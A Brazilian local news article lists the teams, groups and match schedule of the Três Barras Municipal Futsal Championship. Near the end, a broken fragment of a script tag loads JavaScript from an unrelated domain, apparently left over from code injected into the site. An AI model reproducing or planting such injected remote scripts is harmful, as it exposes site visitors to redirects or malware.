InícioDestaqueTabela definida: Municipal de Futsal terá 30 times em quatro categorias

Tabela definida: Municipal de Futsal terá 30 times em quatro categorias

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

A bola pesada volta a rolar em Três Barras, a partir do dia 24 de setembro, com a segunda edição do Campeonato Municipal de Futsal.

 

Com a realização do congresso técnico na noite de sexta-feira (14), ficou definido que 30 equipes disputam a competição em quatro categorias, 18 participantes só na Livre, que estão divididos em quatro chaves.

 

Os jogos da categoria Livre serão realizados todas as segundas, quartas e sextas-feiras, a partir das 18h45 no ginásio de esportes Ione Cyríaco de Souza.

 

As terças-feiras serão reservadas às partidas das categorias Feminino e Máster Masculino, também às 18h45, mas só a partir do dia 02 de outubro.

 

Já as disputas da categoria Infantil serão sempre às 17h45, antes dos jogos da categoria Livre.

 

O campeonato é uma realização do Governo de Três Barras, por meio da secretaria de Educação, Cultura e Esporte, em parceria com a Liga Esportiva Canoinhense (LEC).

 

Confira as chaves e a tabela da competição nas quatro categorias, elaborada pelo professor João Eduardo Bishop, da coordenadoria de Esportes da prefeitura.

 

CATEGORIA LIVRE

 

  CHAVE “A” CHAVE “B”
  1 OS DESTEMIDOS   6 DEIXAQUEUXUTO
  2 UNIÃO TRÊS BARRAS A   7 COLORADO
  3 BOLA DE FOGO   8 CENTRAL
  4 FOLHA SECA   9 BAIXADA
  5 SONOS SEM ELES   10 MARRA
     

 

 

       
       
  CHAVE “C” CHAVE “D”
  11 REAL SÃO CRISTOVÃO   15 UNIÃO TRÊS BARRAS  B
  12 ATLÉTICO TRÊS BARRAS   16 UNIÃO SÃO JOÃO
  13 BRASNILLE   17 GALÁTICOS
  14 REMAR   18 UNIDOS

 

CATEGORIA INFANTIL

 

CHAVE “ÚNICA”

1 CTTBF A
2 CTTBF B
3 UNIÃO TRES BARRAS
4 EVOLUÇÃO JOVEM
5 UNIDOS

 

 

1ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
01 24/09 17:45 INFANTIL CTTBF   A   X   CTTBF  B
02 24/09 18:45 B COLORADO   X   MARRA
03 24/09 19:50 A UNIÃO TRES BARRAS A   X   SONOS SEM ELES
04 24/09 20:50 C REAL SÃO CRISTOVÃO   X   REMAR

 

2ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
05 26/09 17:45 INFANTIL UNIÃO TRES BARRAS   X   EVOLUÇÃO JOVEM
06 26/09 18:45 D UNIÃO TRES BARRAS B   X   UNIDOS
07 26/09 19:50 D UNIÃO SÃO JOÃO   X   GALATICOS
08 26/09 20:50 C ATLETICO TRES BARRAS   X   BRASNILE

 

RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
09 28/09 17:45 INFANTIL CTTBF  B   X   UNIDOS
10 28/09 18:45 B CENTRAL   X   BAIXADA
11 28/09 19:50 A BOLA DE FOGO   X   FOLHA SECA
12 28/09 20:50 C REMAR   X   BRASNILE

 

RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
13 01/10 17:45 INFANTIL UNIDOS   X   UNIÃO TRES BARRAS
14 01/10 18:45 B MARRA   X   CENTRAL
15 01/10 19:50 A SONOS SEM ELES   X   BOLA DE FOGO
16 01/10 20:50 D UNIDOS   X   GALATICOS

 

RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
17 03/10 17:45 INFANTIL EVOLUÇÃO JOVEM   X   UNIDOS
18 03/10 18:45 D UNIÃO TER BARRAS B   X   UNIÃO SÃO JOÃO
19 03/10 19:50 C REAL SÃO CRISTOVÃO   X   ATLETICO TRES BARRAS
20 03/10 20:50 B DEXAQUEUXUTO   X   COLORADO

 

RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
21 05/10 17:45 INFANTIL UNIÃO TRES BARRAS   X   CTTBF  A
22 05/10 18:45 A OS DESTEMIDOS   X   UNIÃO TRES BARRAS A
23 05/10 19:50 B CENTRAL   X   DEXAQUEUXUTO
24 05/10 20:50 C ATLETICO TRES BARRAS   X   REMAR

 

RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                 EQUIPE B
25 08/10 17:45 INFANTIL CTTBF  B   X   UNIÃO TRES BARRAS
26 08/10 18:45 D UNIÃO SÃO JOÃO   X   UNIDOS
27 08/10 19:50 D GALATICOS   X   UNIÃO TRES BARRAS B
28 08/10 20:50 C BRASNILE   X   REAL SÃO JOÃO

 

RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
29 10/10 17:45 INFANTIL CTTBF  A   X   EVOLUÇÃO JOVEM
30 10/10 18:45 B BAIXADA   X   MARRA
31 10/10 19:50 A BOLA DE FOGO   X   OS DESTEMIDOS
32 10/10 20:50 A FOLHA SECA   X   SONOS SEM ELES

 

RODADA

J  Nº DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
33 15/10 17:45 INFANTIL EVOLUÇÃO JOVEM   X   CTTBF  B
34 15/10 18:45 B DEXAQUEUXUTO   X   BAIXADA
35 15/10 19:50 B COLORADO   X   CENTRAL
36 15/10 20:50 A OS DESTEMIDOS   X   FOLHA SECA

 

10ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
37 17/10 17:45 INFANTIL UNIDOS   X   CTTBF  A
38 17/10 18:45 A UNIÃO TRES BARRAS A   X   BOLA DE FOGO
39 17/10 19:50 A SONOS SEM ELES   X   OS DESTEMIDOS
40 17/10 20:50 B BAIXADA   X   COLORADO

*NESTA DATA TERMINA A FASE CLASSIFICATÓRIA PARA O INFANTIL, SERÁ MARCADA DATA PARA A DECISÃO DO 3º LUGAR E FINAL.

 

11ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
41 19/10 18:45 B MARRA   X   DEXAQUEUXUTO
42 19/10 19:50 A FOLHA SECA   X   UNIÃO TRES BARRAS A

 

SEGUNDA FASE

TABELA DE JOGOS

JOGARÃO TODOS CONTRA TODOS NA CHAVE E CLASSIFICAM-SE DUAS EQUIPES DE CADA GRUPO PARA AS SEMIFINAIS E FINAL.

 

 

                   CHAVE   F
05 1 º de C =
06 1 º de D =
07 2 º de C =
08 2 º de D =
  5×8    6×7    8×7    5×6    6×8    7×5

 

                CHAVE  E
01 1 º de A =
02 1 º de B =
03 2 º de A =
04 2 º de B =
  1×4    2×3    4×3    1×2    2×4    3×1

 

12ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
43 22/10 18:45                                          1   X   4
44 22/10 19:50                                          5   X   8
45 22/10 20:50                                          2   X   3

 

 13ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
46 24/10 18:45                                        6   X   7
47 24/10 19:50                                        4   X   3
48 24/10 20:50                                        8   X   7

 

14ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
49 26/10 18:45                                      1   X   2
50 26/10 19:50                                      5   X   6
51 26/10 20:50                                      2   X   4

 

 15ª RODADA

J    

DATA HORA CHAVE               EQUIPE A   X                                EQUIPE B
52 29/10 18:45   6   X   8
53 29/10 19:50   3   X   1
54 29/10 20:50   7   X   5

 

SEMIFINAIS

J

 DATA HORA CHAVE           EQUIPE A              X                                  EQUIPE B          
55 31/10 18:45   1º de E =   X   2º de F =
56 31/10 19:50   1º de F =   X   2 º de E =

 

FINAL

J

 DATA HORA CH           EQUIPE A              X                                  EQUIPE B          
57 05/11 18:45   PERDEDOR JOGO 45   X   PERDEDOR JOGO 46  (3 º Lugar )
58 05/11 19:50   GANHADOR JOGO 45   X   GANHADOR  JOGO 46 ( 1 º  e   2 º )
  • OS HORÁRIOS DOS JOGOS PODEM SOFRER ALTERAÇÕES DE ACORDO COM A NECESSIDADE DA ORGANIZAÇÃO.

 

CATEGORIAS MÁSTER e FEMININO

 

CHAVE ÚNICA – MÁSTER   CHAVE ÚNICA – FEMININO
1-  UNIÃO TRÊS BARRAS 1 DEIXAQUEUXUTO
2-  ESTRELAS 2 UNIÃO TRÊS BARRAS
3-  OLARIA 3 ATLÉTICO TRÊS BARRAS
4-  REMAR    

 

 

1ª RODADA

J    

DATA HORA CH               EQUIPE A   X                                EQUIPE B
01 02/10 18:45 MASC. ESTRELAS   X   OLARIA
02 02/10 19:50 FEM. UNIÃO TRES BARRAS   X   ATLETICO TRES BARRAS
03 02/10 20:50 MASC. UNIÃO TRES BARRAS   X   REMAR

 

2ª RODADA

J    

DATA HORA CH               EQUIPE A   X                                EQUIPE B
04 09/10 18:45 MASC. REMAR   X   OLARIA
05 09/10 19:50 FEM. DEIXAQUEUXUTO   X   UNIÃO TRES BARRAS
06 09/10 20:50 MASC. UNIÃO TRES BARRAS   X   ESTRELAS

 

3ª RODADA

J    

DATA HORA CH               EQUIPE A   X                                EQUIPE B
07 16/10 18:45 MASC. ESTRELAS   X   REMAR
08 16/10 19:50 FEM. ATLETICO TRES BARRAS   X   DEIXAQUEUXUTO
09 16/10 20:50 MASC. OLARIA   X   UNIÃO TRES BARRAS

 

FINAL

J    

DATA HORA CH               EQUIPE A   X                                EQUIPE B
10 23/10 18:45 MASC.     X                                                               3º LUGAR
11 23/10 20:50 MASC.                                                                     1º LUGAR

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.